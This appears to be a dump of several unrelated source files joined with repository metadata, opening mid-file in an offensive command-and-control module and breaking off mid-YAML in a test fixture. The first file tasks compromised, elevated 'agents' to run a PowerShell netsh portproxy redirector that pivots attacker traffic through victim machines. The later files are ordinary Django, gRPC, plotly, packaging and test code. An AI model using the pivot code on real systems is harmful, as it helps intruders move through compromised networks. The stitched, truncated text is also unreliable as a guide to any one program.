self.options[option]['Value'] = sessionID
elif option.lower() == 'host':
if self.options[option]['Value'].startswith('https://'):
host = "https://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
self.options[option]['Value'] = host
else:
host = "http://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
self.options[option]['Value'] = host
# check to see if there was a host value at all
if "Host" not in self.options.keys():
self.options['Host']['Value'] = host
self.mainMenu.agents.add_agent_task_db(tempOptions['Name']['Value'], "TASK_SHELL", script)
msg = "Tasked agent to install Pivot listener "
self.mainMenu.agents.save_agent_log(tempOptions['Name']['Value'], msg)
return True
elif self.mainMenu.agents.get_language_db(self.options['Name']['Value']).startswith('py'):
# not implemented
script = """
"""
print helpers.color("[!] Python pivot listener not implemented")
return False
else:
print helpers.color("[!] Unable to determine the language for the agent")
else:
print helpers.color("[!] Agent is not present in the cache")
return False
def shutdown(self, name=''):
"""
If a server component was started, implement the logic that kills the particular
named listener here.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
sessionID = self.mainMenu.agents.get_agent_id_db(name)
isElevated = self.mainMenu.agents.is_agent_elevated(sessionID)
if self.mainMenu.agents.is_agent_present(name) and isElevated:
if self.mainMenu.agents.get_language_db(sessionID).startswith("po"):
script = """
function Invoke-Redirector {
param($ListenPort, $ConnectHost, [switch]$Reset, [switch]$ShowAll)
if($ShowAll){
$out = netsh interface portproxy show all
if($out){
$out
}
else{
"[*] no redirectors currently configured"
}
}
elseif($Reset){
$out = netsh interface portproxy reset
if($out){
$out
}
else{
"[+] successfully removed all redirectors"
}
}
else{
if((-not $ListenPort)){
"[!] netsh error: required option not specified"
}
else{
$ConnectAddress = ""
$ConnectPort = ""
$parts = $ConnectHost -split(":")
if($parts.Length -eq 2){
# if the form is http[s]://HOST or HOST:PORT
if($parts[0].StartsWith("http")){
$ConnectAddress = $parts[1] -replace "//",""
if($parts[0] -eq "https"){
$ConnectPort = "443"
}
else{
$ConnectPort = "80"
}
}
else{
$ConnectAddress = $parts[0]
$ConnectPort = $parts[1]
}
}
elseif($parts.Length -eq 3){
# if the form is http[s]://HOST:PORT
$ConnectAddress = $parts[1] -replace "//",""
$ConnectPort = $parts[2]
}
if($ConnectPort -ne ""){
$out = netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$ConnectAddress connectport=$ConnectPort protocol=tcp
if($out){
$out
}
else{
"[+] successfully added redirector on port $ListenPort to $ConnectHost"
}
}
else{
"[!] netsh error: host not in http[s]://HOST:[PORT] format"
}
}
}
}
Invoke-Redirector"""
script += " -Reset"
self.mainMenu.agents.add_agent_task_db(sessionID, "TASK_SHELL", script)
msg = "Tasked agent to uninstall Pivot listener "
self.mainMenu.agents.save_agent_log(sessionID, msg)
elif self.mainMenu.agents.get_language_db(sessionID).startswith("py"):
print helpers.color("[!] Shutdown not implemented for python")
else:
print helpers.color("[!] Agent is not present in the cache or not elevated")
pass
| 46.94186
| 260
| 0.50197
|
794b24ae713e7d84056524237c695218ae3544ad
| 754
|
py
|
Python
|
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | 1
|
2022-02-28T11:44:07.000Z
|
2022-02-28T11:44:07.000Z
|
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | null | null | null |
grimoirebots/urls.py
|
jjmerchante/grimoirebots
|
afa0a70ecbb169ba49302cc7bc8c6577bebba5ca
|
[
"MIT"
] | 1
|
2022-03-09T08:57:15.000Z
|
2022-03-09T08:57:15.000Z
|
"""grimoirebots URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| 34.272727
| 77
| 0.710875
|
794b2505e1f910557d3cc0cafbffbfe6b781adb9
| 918
|
py
|
Python
|
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | null | null | null |
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | null | null | null |
gevir_website/urls.py
|
gevirank/gevir_website
|
e5b43daa5ed64af7e1bba3d602ed21e43f5bc131
|
[
"MIT"
] | 1
|
2021-05-19T01:41:27.000Z
|
2021-05-19T01:41:27.000Z
|
"""gevir_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.conf.urls import include
from gevir import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^gevir/', include('gevir.urls')),
url(r'^admin/', admin.site.urls),
]
| 35.307692
| 79
| 0.700436
|
794b25c0debf1e227c7f9bb1beefbc5a82a40a46
| 1,326
|
py
|
Python
|
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | 26
|
2019-06-07T05:29:47.000Z
|
2022-03-19T15:32:27.000Z
|
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | null | null | null |
leetcode/google/tagged/medium/permutation.py
|
alvinctk/google-tech-dev-guide
|
9d7759bea1f44673c2de4f25a94b27368928a59f
|
[
"Apache-2.0"
] | 6
|
2019-10-10T06:39:28.000Z
|
2020-05-12T19:50:55.000Z
|
from typing import List
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
"""
Time Complexity: O(Summation of P(N, k))
The algorithm is faster than O(N * N!), but slower than O(N!).
P(N, k) := permutation of k elements out of N elements.
P(N, k) = N!/(N-k)!
Summation of P(N, k) from k = 1 to k = N <= Summation of N! from k=1 to k = N.
O(N!) <= O(Summation of P(N, k) <= O(N * N!)
Space Complexity: O(N!) since the solution needs to be stored.
Other non dominant space complexity: O(n) due to recursive depth stack frame
Runtime: 48 ms, faster than 71.27% of Python3 online submissions for Permutations.
Memory Usage: 13.9 MB, less than 5.36% of Python3 online submissions for Permutations.
"""
def swap(a, b):
nums[a], nums[b] = nums[b], nums[a]
def helper(permutation, start, end):
if start == end:
permutation.append(nums.copy())
return
i = start
while i < end:
swap(start, i)
helper(permutation, start + 1, end)
swap(i, start)
i += 1
permutation = []
helper(permutation, 0, len(nums))
return permutation
| 31.571429
| 94
| 0.534691
|
794b26336ef5eeb9b5532069f0e0909079ea6630
| 441
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/surface/contours/y/_end.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class EndValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(self, plotly_name="end", parent_name="surface.contours.y", **kwargs):
super(EndValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
| 33.923077
| 86
| 0.648526
|
794b26bf2ffc1eb4323aacd654d2351d84033007
| 14,599
|
py
|
Python
|
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
"MIT"
] | null | null | null |
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
"MIT"
] | null | null | null |
python/redish_pb2_grpc.py
|
kitchen/redish
|
cb4f1275d9ec3313ed3f12a9dd3be13fb85aae67
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import redish_pb2 as redish__pb2
class RedishStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.get = channel.unary_unary(
'/redish.Redish/get',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.SingleValue.FromString,
)
self.set = channel.unary_unary(
'/redish.Redish/set',
request_serializer=redish__pb2.SetRequest.SerializeToString,
response_deserializer=redish__pb2.OK.FromString,
)
self.dele = channel.unary_unary(
'/redish.Redish/dele',
request_serializer=redish__pb2.KeyList.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.exists = channel.unary_unary(
'/redish.Redish/exists',
request_serializer=redish__pb2.KeyList.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.incr = channel.unary_unary(
'/redish.Redish/incr',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.decr = channel.unary_unary(
'/redish.Redish/decr',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.incrby = channel.unary_unary(
'/redish.Redish/incrby',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.decrby = channel.unary_unary(
'/redish.Redish/decrby',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.strlen = channel.unary_unary(
'/redish.Redish/strlen',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.getset = channel.unary_unary(
'/redish.Redish/getset',
request_serializer=redish__pb2.KeyValue.SerializeToString,
response_deserializer=redish__pb2.SingleValue.FromString,
)
self.mget = channel.unary_unary(
'/redish.Redish/mget',
request_serializer=redish__pb2.KeyList.SerializeToString,
response_deserializer=redish__pb2.ValueList.FromString,
)
self.mset = channel.unary_unary(
'/redish.Redish/mset',
request_serializer=redish__pb2.KeyValueList.SerializeToString,
response_deserializer=redish__pb2.OK.FromString,
)
self.type = channel.unary_unary(
'/redish.Redish/type',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.SingleValue.FromString,
)
self.expire = channel.unary_unary(
'/redish.Redish/expire',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.pexpire = channel.unary_unary(
'/redish.Redish/pexpire',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.expireat = channel.unary_unary(
'/redish.Redish/expireat',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.pexpireat = channel.unary_unary(
'/redish.Redish/pexpireat',
request_serializer=redish__pb2.KeyIntValue.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.persist = channel.unary_unary(
'/redish.Redish/persist',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.ttl = channel.unary_unary(
'/redish.Redish/ttl',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
self.pttl = channel.unary_unary(
'/redish.Redish/pttl',
request_serializer=redish__pb2.Key.SerializeToString,
response_deserializer=redish__pb2.IntValue.FromString,
)
class RedishServicer(object):
# missing associated documentation comment in .proto file
pass
def get(self, request, context):
"""https://redis.io/commands
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def set(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def dele(self, request, context):
"""has to be dele not del because python del is a keyword
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def exists(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def incr(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def decr(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def incrby(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def decrby(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def strlen(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getset(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def mget(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def mset(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def type(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def expire(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def pexpire(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def expireat(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def pexpireat(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def persist(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ttl(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def pttl(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RedishServicer_to_server(servicer, server):
rpc_method_handlers = {
'get': grpc.unary_unary_rpc_method_handler(
servicer.get,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.SingleValue.SerializeToString,
),
'set': grpc.unary_unary_rpc_method_handler(
servicer.set,
request_deserializer=redish__pb2.SetRequest.FromString,
response_serializer=redish__pb2.OK.SerializeToString,
),
'dele': grpc.unary_unary_rpc_method_handler(
servicer.dele,
request_deserializer=redish__pb2.KeyList.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'exists': grpc.unary_unary_rpc_method_handler(
servicer.exists,
request_deserializer=redish__pb2.KeyList.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'incr': grpc.unary_unary_rpc_method_handler(
servicer.incr,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'decr': grpc.unary_unary_rpc_method_handler(
servicer.decr,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'incrby': grpc.unary_unary_rpc_method_handler(
servicer.incrby,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'decrby': grpc.unary_unary_rpc_method_handler(
servicer.decrby,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'strlen': grpc.unary_unary_rpc_method_handler(
servicer.strlen,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'getset': grpc.unary_unary_rpc_method_handler(
servicer.getset,
request_deserializer=redish__pb2.KeyValue.FromString,
response_serializer=redish__pb2.SingleValue.SerializeToString,
),
'mget': grpc.unary_unary_rpc_method_handler(
servicer.mget,
request_deserializer=redish__pb2.KeyList.FromString,
response_serializer=redish__pb2.ValueList.SerializeToString,
),
'mset': grpc.unary_unary_rpc_method_handler(
servicer.mset,
request_deserializer=redish__pb2.KeyValueList.FromString,
response_serializer=redish__pb2.OK.SerializeToString,
),
'type': grpc.unary_unary_rpc_method_handler(
servicer.type,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.SingleValue.SerializeToString,
),
'expire': grpc.unary_unary_rpc_method_handler(
servicer.expire,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'pexpire': grpc.unary_unary_rpc_method_handler(
servicer.pexpire,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'expireat': grpc.unary_unary_rpc_method_handler(
servicer.expireat,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'pexpireat': grpc.unary_unary_rpc_method_handler(
servicer.pexpireat,
request_deserializer=redish__pb2.KeyIntValue.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'persist': grpc.unary_unary_rpc_method_handler(
servicer.persist,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'ttl': grpc.unary_unary_rpc_method_handler(
servicer.ttl,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
'pttl': grpc.unary_unary_rpc_method_handler(
servicer.pttl,
request_deserializer=redish__pb2.Key.FromString,
response_serializer=redish__pb2.IntValue.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'redish.Redish', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 39.456757
| 72
| 0.722447
|
794b277ae34addcd956bb2c9cc870a95e6a8c990
| 3,073
|
py
|
Python
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 254
|
2015-01-09T23:39:22.000Z
|
2021-11-22T17:47:34.000Z
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 40
|
2015-02-06T00:09:56.000Z
|
2020-12-20T03:38:25.000Z
|
setup.py
|
JaphetSamuel/django-mobile
|
17ebc0ed01f5495c4087633336bd9cf5276de793
|
[
"BSD-3-Clause"
] | 106
|
2015-01-16T08:52:34.000Z
|
2022-03-08T00:51:58.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
README_PATH = os.path.join(os.path.dirname(__file__), 'README.rst')
CHANGES_PATH = os.path.join(os.path.dirname(__file__), 'CHANGES.rst')
def readfile(filename):
if sys.version_info[0] >= 3:
return open(filename, 'r', encoding='utf-8').read()
else:
return open(filename, 'r').read()
def get_author(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = readfile(os.path.join(package, '__init__.py'))
author = re.search("__author__ = u?['\"]([^'\"]+)['\"]", init_py).group(1)
return UltraMagicString(author)
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = readfile(os.path.join(package, '__init__.py'))
return re.search("__version__ = ['\"]([^'\"]+)['\"]", init_py).group(1)
class UltraMagicString(object):
'''
Taken from
http://stackoverflow.com/questions/1162338/whats-the-right-way-to-use-unicode-metadata-in-setup-py
'''
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def __unicode__(self):
return self.value.decode('UTF-8')
def __add__(self, other):
return UltraMagicString(self.value + str(other))
def split(self, *args, **kw):
return self.value.split(*args, **kw)
if sys.version_info[0] >= 3:
long_description = u'\n\n'.join((
readfile(README_PATH),
readfile(CHANGES_PATH),
))
else:
long_description = u'\n\n'.join((
readfile(README_PATH).decode('utf-8'),
readfile(CHANGES_PATH).decode('utf-8'),
))
long_description = long_description.encode('utf-8')
long_description = UltraMagicString(long_description)
setup(
name='django-mobile',
version=get_version('django_mobile'),
url='https://github.com/gregmuellegger/django-mobile',
license='BSD',
description=u'Detect mobile browsers and serve different template flavours to them.',
long_description=long_description,
author=get_author('django_mobile'),
author_email='gregor@muellegger.de',
keywords='django,mobile',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content",
"Topic :: Software Development :: Libraries :: Python Modules",
],
packages=[
'django_mobile',
'django_mobile.cache',
],
tests_require=['Django', 'mock'],
test_suite='django_mobile_tests.runtests.runtests',
)
| 29.548077
| 102
| 0.631305
|
794b27fbfb7877bad7a6f48828244e7cf0f12306
| 3,895
|
py
|
Python
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | 2
|
2021-05-18T14:24:27.000Z
|
2021-06-09T10:47:32.000Z
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | 4
|
2020-09-28T19:23:09.000Z
|
2021-11-17T16:26:51.000Z
|
spook/views.py
|
pablo-moreno/django_spook
|
0d63628abbd530ac5b31f7abb4845fef500bdfb1
|
[
"MIT"
] | null | null | null |
from typing import Type
from rest_framework.generics import (
ListAPIView,
RetrieveAPIView,
CreateAPIView,
UpdateAPIView,
DestroyAPIView,
)
from rest_framework.response import Response
from .resources import APIResource
from .validators import InputValidator
class APIResourceMixin(object):
resource: Type[APIResource] = None
def get_token(self, request):
raise NotImplementedError
def get_resource(self):
if not self.resource:
raise Exception(
"You have to specify the service property or override .get_resource() function"
)
return self.resource
def get_validator(self):
serializer = self.get_serializer_class()
class Validator(InputValidator):
serializer_class = serializer
return Validator
class APIResourceListView(ListAPIView, APIResourceMixin):
def list(self, request, *args, **kwargs):
resource = self.get_resource()
token = self.get_token(request)
params = request.query_params
context = {
"request": request,
}
response = resource(
token=token, validator=self.get_validator(), context=context
).list(**params)
return Response(data=response.data, status=response.status)
class APIResourceRetrieveView(RetrieveAPIView, APIResourceMixin):
def retrieve(self, request, *args, **kwargs):
pk = kwargs.get(self.lookup_field)
resource = self.get_resource()
token = self.get_token(request)
params = request.query_params
context = {
"request": request,
}
response = resource(
token=token, validator=self.get_validator(), context=context
).retrieve(pk, **params)
return Response(data=response.data, status=response.status)
class APIResourceCreateView(CreateAPIView, APIResourceMixin):
def create(self, request, *args, **kwargs):
resource = self.get_resource()
token = self.get_token(request)
context = {
"request": request,
}
response = resource(
token=token, validator=self.get_validator(), context=context
).create(data=request.data, query=request.query_params)
return Response(data=response.data, status=response.status)
class APIResourcePutView(UpdateAPIView, APIResourceMixin):
def update(self, request, *args, **kwargs):
partial = kwargs.pop("partial", False)
pk = kwargs.get(self.lookup_field)
resource = self.get_resource()
token = self.get_token(request)
context = {
"request": request,
}
response = resource(
token=token, validator=self.get_validator(), context=context
).update(pk=pk, data=request.data, query=request.query_params, partial=partial)
return Response(data=response.data, status=response.status)
class APIResourceDestroyView(DestroyAPIView, APIResourceMixin):
def destroy(self, request, *args, **kwargs):
pk = kwargs.get(self.lookup_field)
resource = self.get_resource()
token = self.get_token(request)
context = {
"request": request,
}
response = resource(
token=token, validator=self.get_validator(), context=context
).delete(pk=pk, query=request.query_params)
return Response(data=response.data, status=response.status)
class APIResourceRetrieveUpdateView(APIResourceRetrieveView, APIResourcePutView):
pass
class APIResourceRetrieveUpdateDestroyView(
APIResourceRetrieveUpdateView, APIResourceDestroyView
):
pass
class APIResourceListCreateView(APIResourceListView, APIResourceCreateView):
pass
| 30.912698
| 96
| 0.644159
|
794b28159699b608333e89ada169a4226dcf2eb2
| 5,132
|
py
|
Python
|
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | 1
|
2022-03-17T08:05:44.000Z
|
2022-03-17T08:05:44.000Z
|
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | null | null | null |
tests/checkpoint/conftest.py
|
arunnthevapalan/great_expectations
|
97f1481bcd1c3f4d8878c6f383f4e6f008b20cd1
|
[
"Apache-2.0"
] | null | null | null |
import os
import shutil
import pytest
from great_expectations import DataContext
from great_expectations.core import ExpectationConfiguration
from great_expectations.data_context.util import file_relative_path
@pytest.fixture
def titanic_pandas_data_context_stats_enabled_and_expectation_suite_with_one_expectation(
titanic_pandas_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled,
):
context: DataContext = titanic_pandas_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled
# create expectation suite
suite = context.create_expectation_suite("my_expectation_suite")
expectation = ExpectationConfiguration(
expectation_type="expect_column_values_to_be_between",
kwargs={"column": "col1", "min_value": 1, "max_value": 2},
)
# NOTE Will 20211208 _add_expectation() method, although being called by an ExpectationSuite instance, is being
# called within a fixture, and so will call the private method _add_expectation() and prevent it from sending a
# usage_event.
suite._add_expectation(expectation, send_usage_event=False)
context.save_expectation_suite(suite)
return context
@pytest.fixture
def titanic_spark_data_context_with_v013_datasource_with_checkpoints_v1_with_empty_store_stats_enabled(
tmp_path_factory,
monkeypatch,
spark_session,
):
# Re-enable GE_USAGE_STATS
monkeypatch.delenv("GE_USAGE_STATS")
project_path: str = str(tmp_path_factory.mktemp("titanic_data_context"))
context_path: str = os.path.join(project_path, "great_expectations")
os.makedirs(os.path.join(context_path, "expectations"), exist_ok=True)
data_path: str = os.path.join(context_path, "..", "data", "titanic")
os.makedirs(os.path.join(data_path), exist_ok=True)
shutil.copy(
file_relative_path(
__file__,
os.path.join(
"..",
"test_fixtures",
"great_expectations_v013_no_datasource_stats_enabled.yml",
),
),
str(os.path.join(context_path, "great_expectations.yml")),
)
shutil.copy(
file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
str(
os.path.join(
context_path, "..", "data", "titanic", "Titanic_19120414_1313.csv"
)
),
)
shutil.copy(
file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
str(
os.path.join(context_path, "..", "data", "titanic", "Titanic_19120414_1313")
),
)
shutil.copy(
file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
str(os.path.join(context_path, "..", "data", "titanic", "Titanic_1911.csv")),
)
shutil.copy(
file_relative_path(__file__, os.path.join("..", "test_sets", "Titanic.csv")),
str(os.path.join(context_path, "..", "data", "titanic", "Titanic_1912.csv")),
)
context: DataContext = DataContext(context_root_dir=context_path)
assert context.root_directory == context_path
datasource_config: str = f"""
class_name: Datasource
execution_engine:
class_name: SparkDFExecutionEngine
data_connectors:
my_basic_data_connector:
class_name: InferredAssetFilesystemDataConnector
base_directory: {data_path}
default_regex:
pattern: (.*)\\.csv
group_names:
- data_asset_name
my_special_data_connector:
class_name: ConfiguredAssetFilesystemDataConnector
base_directory: {data_path}
glob_directive: "*.csv"
default_regex:
pattern: (.+)\\.csv
group_names:
- name
assets:
users:
base_directory: {data_path}
pattern: (.+)_(\\d+)_(\\d+)\\.csv
group_names:
- name
- timestamp
- size
my_other_data_connector:
